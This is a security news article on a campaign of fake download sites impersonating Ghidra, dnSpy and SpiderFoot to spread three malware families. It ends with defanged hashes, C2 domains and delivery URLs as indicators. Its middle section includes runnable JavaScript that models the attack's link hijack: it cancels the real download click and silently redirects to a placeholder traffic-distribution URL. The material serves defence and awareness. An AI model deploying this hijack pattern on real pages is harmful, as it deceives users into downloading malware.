Hackers Impersonate Ghidra, dnSpy, and SpiderFoot to Spread Malware via Fake Download Sites

Original news source: cybersecuritynews.com (Cyber Security News)


Hackers are creating convincing fake websites that impersonate popular security tools to trick users into downloading malware.

Instead of obvious phishing pages, these sites look almost identical to real project portals, complete with professional designs and links pointing to actual GitHub repositories.

The moment a user clicks the download button, something very different happens behind the scenes.

Rather than getting the software they came for, victims are silently routed through a hidden traffic-filtering layer known as a Traffic Distribution System, or TDS.

This system acts as a gatekeeper, deciding which users get redirected to malware and which receive a harmless file. It screens for location, browser type, VPN usage, and whether a security researcher might be watching, making it extremely difficult to detect or catch in the act.

Analysts at Check Point Research investigated this large-scale campaign and found that the fake sites load a JavaScript file hosted on Amazon CloudFront.

This script intercepts the very first download click and quietly hands the user off to the TDS, with no visible sign that anything unusual has occurred.

Check Point said in a report shared with Cyber Security News (CSN) that the operation specifically targets tools trusted by security professionals, including Ghidra, dnSpy, and SpiderFoot.

The campaign has been active since at least December 2025, with recorded malware delivery confirmed from early January 2026. VirusTotal telemetry shows more than 5,000 submissions tied to related samples, and researchers note the real exposure is likely much higher.

The fact that the impersonated tools are used daily by security researchers makes this campaign particularly alarming, since it targets the very people trained to spot these threats.

Three distinct malware families serve as the final payloads. RemusStealer is a newly emerged infostealer that harvests data from more than 20 browsers and also targets cryptocurrency wallets, password managers, and two-factor authentication tools.

AnimateClipper silently monitors the clipboard and swaps copied wallet addresses with attacker-controlled ones, potentially redirecting real funds without the victim ever realizing it.

A third payload named SessionGate is a multi-stage loader with heavy obfuscation and one-time-key delivery that makes it extraordinarily difficult for analysts to examine.

More than 100 active fake websites have been identified in this cluster, all sharing the same CloudFront-hosted scripts and campaign identifiers.

Sites like ghidralite[.]com and dnspy[.]org appear near the top of Google results for relevant queries, lending them a false sense of authority.

Impersonated websites of popular software tools (Source – Check Point)

When a user hovers over the download button, the browser status bar even shows a real GitHub URL, so cautious users may not notice anything is wrong.

Hovering over the download button reveals the legitimate GitHub repository URL (Source – Check Point)

The JavaScript loaded by these pages listens for the user’s first interaction and intercepts it before normal navigation can proceed. On Chrome it captures a mousedown event; on Firefox it uses a click event.

It then generates a TDS runtime URL, redirects the user silently, and cancels the original navigation entirely. The victim ends up somewhere completely different from where they intended, and the whole process is invisible.
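To make the interception concrete, here is an added example that models the behaviour described above; it is not the campaign's script (Check Point did not publish it in this article) and it runs offline on Node's built-in EventTarget and Event. The TDS base URL, the query parameter names and the campaign id are placeholders; the user-agent test is an assumption about how the script tells Chrome from Firefox; the GitHub URL is the real Ghidra repository, used only as the legitimate link the button advertises.

```javascript
// Added example (not the campaign's own script): models the download-button
// hijack with Node's built-in EventTarget/Event so it runs offline.
// Placeholders: TDS_BASE, the query parameter names and the campaign id.

const TDS_BASE = "https://tds.invalid/go"; // placeholder; .invalid never resolves

// The article reports mousedown on Chrome and click on Firefox.
// Assumption: the browser is picked from the user-agent string.
function pickEvent(userAgent) {
  if (/firefox/i.test(userAgent)) return "click";
  if (/chrome/i.test(userAgent)) return "mousedown";
  return "click"; // assumption: anything else falls back to click
}

// Per-visit "runtime" URL for the TDS. Parameter names are illustrative.
function buildTdsUrl(campaignId, intendedHref, nonce) {
  const u = new URL(TDS_BASE);
  u.searchParams.set("c", campaignId);
  u.searchParams.set("ref", intendedHref);
  u.searchParams.set("n", nonce);
  return u.toString();
}

// Hook the first interaction only, in the capture phase, cancel the real
// navigation and send the visitor to the TDS instead. `navigate` stands in
// for window.location.assign so the destination can be observed.
function hijackFirstInteraction(link, userAgent, campaignId, navigate) {
  const eventName = pickEvent(userAgent);
  link.addEventListener(
    eventName,
    (event) => {
      event.preventDefault();  // the browser never follows link.href
      event.stopPropagation(); // other handlers never see the event
      navigate(buildTdsUrl(campaignId, link.href, Date.now().toString(36)));
    },
    { once: true, capture: true }
  );
  return eventName;
}

// Simulated visit: the anchor keeps advertising the legitimate repository
// (what the status bar shows on hover) while the first interaction goes elsewhere.
function simulateVisit(userAgent) {
  const link = new EventTarget();
  link.href = "https://github.com/NationalSecurityAgency/ghidra/releases";
  const visited = [];
  const eventName = hijackFirstInteraction(link, userAgent, "demo-campaign",
    (url) => visited.push(url));

  const first = new Event(eventName, { cancelable: true });
  link.dispatchEvent(first);
  const second = new Event(eventName, { cancelable: true });
  link.dispatchEvent(second);

  return {
    eventName,
    hrefShown: link.href,                     // unchanged: hover still looks clean
    firstCancelled: first.defaultPrevented,   // true: real download blocked
    secondCancelled: second.defaultPrevented, // false: listener already removed
    visited,                                  // one TDS URL, from the first event only
  };
}

console.log(simulateVisit("Mozilla/5.0 (Windows NT 10.0) Chrome/122.0 Safari/537.36"));
```

The point for a defender is in the return value: `hrefShown` never changes, so hovering the button (or reading the HTML) tells you nothing, while the only interaction a real user ever makes is the first one, which is the one that is cancelled and redirected. Checking what the browser actually requested (the Network panel, a proxy log, or the URL you land on) is the check that works; the second, non-hijacked interaction is also why a researcher who clicks twice sees the legitimate download and concludes the page is clean.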

SessionGate: Built to Resist Every Analyst

Among all payloads found, SessionGate stood out for how aggressively it resists analysis.

PUA branch infection chain (Source – Check Point)

The initial download is a 7-Zip archive of around 20 MB. Of the executable it contains, roughly 15 MB is the actual program and the remaining 5 MB is obfuscated loader code designed to break tools like IDA's decompiler.

Functions can exceed 500 KB in size, and encrypted strings are placed inside code regions to confuse disassemblers further.

Bogus math, opaque predicates and encrypted strings in the analyzed samples (Source – Check Point)

The decryption key for the final payload stage is generated server-side and released only once per victim session. If a researcher tries to replay the chain from a different IP address, the server returns a valid-looking but useless key, making the payload completely unreadable.

Security teams are strongly advised to download software exclusively from official project pages or verified repositories, to verify file hashes (and signatures where the project publishes them) against the values on the official page rather than on the download site, and to monitor outbound connections to the C2 domains and infrastructure identified in this campaign. Note that the hover-over check is not sufficient here: the status bar shows the real GitHub URL even though the click is intercepted.

Indicators of Compromise (IoCs):

Type Indicator Description
SHA-256 598b023e56c45b19173e8f96c1c88036d732fec305cf6bf1b9cf4dbe304beb7f SessionGate Stage 1
SHA-256 74091f5a8746a1c68d73e1fc1e4e1ff514632ee3f632a8b306f35dabae2d2b64 SessionGate Stage 1
SHA-256 15e6df0c95f2147952308e640d55270e9d097639eaebb34d4b352415f1c6bceb SessionGate Stage 1
SHA-256 3bb92771e287aa0a8bdd8e5b5bb697427223eaefded3d9b64b5d5c32ad40f3c2 SessionGate Stage 1
SHA-256 cbad672d9bd06ce91ce465d049e50696fbaec9d209ca0ab1fd814d993d04bc9b SessionGate Stage 1 / Stage 2
SHA-256 4cdb1f7ac502289119f7f8256f00baaa994e6ecfb4000dcf5e1c46073508fcb3 SessionGate Stage 2
SHA-256 ce0888df5e28716432013a8ae002437bd3e993fbe8362c5ff9efbddabfe0ab77 SessionGate Stage 2
SHA-256 26f2abfc254a59c2386dd46dca16744f7147a0f0366cb6008e1d53219175f44c SessionGate Stage 2
SHA-256 e6a1a428a7c09c9946f7c0179d89b263f442dc3208b5144a9146c200e4185bd6 AnimateClipper
SHA-256 87361ba2bb412dcf49f8738f3b8b9b7dccb557ad2e76ea8d98ffa5b098ae3886 AnimateClipper
SHA-256 39dc2327fe1e5a56ac5ad9dc02f0386cff3d83dcfdc558cacba42ebb9dcc5ec2 RemusStealer
SHA-256 2e842eab0c16ddd1a2ec4a56610adb58d115b65a1e08e9b67e7e375f8eed0873 RemusStealer
Domain appfreshstart[.]com SessionGate C2
Domain appgetonline[.]com SessionGate C2
Domain webinnosetup[.]com SessionGate C2
Domain appmakingcenter[.]com SessionGate C2
Domain yourfastcrc[.]com SessionGate CRC C2
Domain mobileversioncrc[.]com SessionGate CRC C2
Domain webcrcprove[.]com SessionGate CRC C2
Domain integritycrc[.]com SessionGate CRC C2
URL http://buccstanor[.]pics:28313 RemusStealer C2 (primary)
URL http://baxe[.]pics:48261 RemusStealer C2 (fallback)
URL http://217.156.122[.]75:1378 RemusStealer C2
URL http://intem[.]lat:9592 RemusStealer C2
URL http://ropea[.]top:28313 RemusStealer C2
URL http://forestoaker[.]com:6290 RemusStealer C2
URL http://buccstanor[.]pics:48261 RemusStealer C2
URL http://94.231.205[.]229:28313 RemusStealer C2
URL http://gluckcreek[.]online:48261 RemusStealer C2
URL https://185.0xA1.0xFB[.]58/navy.7z AnimateClipper delivery URL
URL http://194.150.220[.]218/4SLEYpfAk57hGubo/fo0suc2ki2.rtf AnimateClipper stage URL
URL https://cdn-1415.brightcanvas[.]digital/fo0suc2ki2.rtf AnimateClipper stage URL
Domain kr.hugo-lapp[.]co AnimateClipper C2
Domain io.hugo-lapp[.]lat AnimateClipper C2
Domain cw.hugo-lapp[.]lat AnimateClipper C2
Domain st.hugo-lapp[.]lat AnimateClipper C2
Domain td.hugo-lapp[.]lat AnimateClipper C2
Domain fd.hugo-lapp[.]lat AnimateClipper C2
Domain ed.hugo-lapp[.]lat AnimateClipper C2
Domain flame-guard[.]cc AnimateClipper C2
Domain carlessclapped[.]com AnimateClipper C2
Domain ghidralite[.]com Fake Ghidra impersonation site
Domain dnspy[.]org Fake dnSpy impersonation site
Domain ilspy[.]org Fake ILSpy impersonation site
Domain originaldownloads[.]info SessionGate landing page
Domain getfluxfile[.]com SessionGate landing page
Domain oundhertobeconsist[.]org TDS redirector domain
Domain javascriptapiusa[.]com SessionGate payload validation

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
